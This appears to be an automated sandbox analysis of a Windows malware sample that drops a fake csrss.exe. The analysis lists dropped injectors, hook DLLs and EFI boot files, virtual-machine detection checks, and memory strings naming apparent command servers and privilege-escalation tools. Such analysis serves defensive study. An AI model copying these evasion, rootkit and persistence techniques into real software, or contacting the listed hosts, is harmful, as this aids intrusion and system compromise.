Source: csrss.exe	Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\Windows\windefender.exe	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)	Jump to dropped file

Source: C:\Windows\rss\csrss.exe

Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: VBoxGuest	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: vmci	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: HGFS	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: VBoxTrayIPC	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: \pipe\VBoxTrayIPC	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	File opened / queried: VBoxMiniRdrDN	Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: csrss.exe	Binary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
Source: 1dyvctHqv1.exe, 0000000C.00000002.332838635.00000000160FE000.00000004.00000001.sdmp	Binary or memory string: svchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe1dyvcthqv1.exexennet$
Source: csrss.exe	Binary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: vmusrvc.exe
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe	Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: qemuvirtual
Source: csrss.exe	Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe	Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: csrss.exe	Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: csrss.exe	Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: csrss.exe	Binary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: 1dyvctHqv1.exe, 0000000C.00000002.332838635.00000000160FE000.00000004.00000001.sdmp	Binary or memory string: xennet6xensvcxenvdb
Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	Binary or memory string: 11VBoxSFVT(%d)WINDIRWib
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: systemvboxtray.exe
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s%d%s/%s%s:%d%s=%s%v-%v"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:**@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vmxnet[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
Source: csrss.exe	Binary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe1dyvcthqv1.exevmci$
Source: csrss.exe	Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe	Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: RegCreateKeyExWRegCloseKeysvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeCreateFileW
Source: csrss.exe	Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vmmousevmusb$
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
Source: 1dyvctHqv1.exe, 0000000C.00000002.332691584.00000000160D8000.00000004.00000001.sdmp	Binary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProHKEY_USERS\ardz\Desktop\1dyvctHqv1.exe" "C:\Users\user\Desktop\1dyvctHqv1.exe" S-1-5-21-3853321935-2125563209-4053062332-1002svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exesvchost.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.execsrss.exewininit.execsrss.exesvchost.exesvchost.exesvchost.exe
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exe
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vboxservice.exe
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: wtsapi32.dllWTSQuerySessionInformationWuseradvapi32.dllLookupAccountNameWcomputerConvertSidToStringSidWkernel32.dllGetModuleFileNameWC:\Users\user\DesktopSetCurrentDirectoryWole32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTimeB3SR64GYOpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe1dyvctHqv1.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestvgauthservice.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exevgauthservice.exevgauthservice.
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vboxtray.exe
Source: csrss.exe	Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
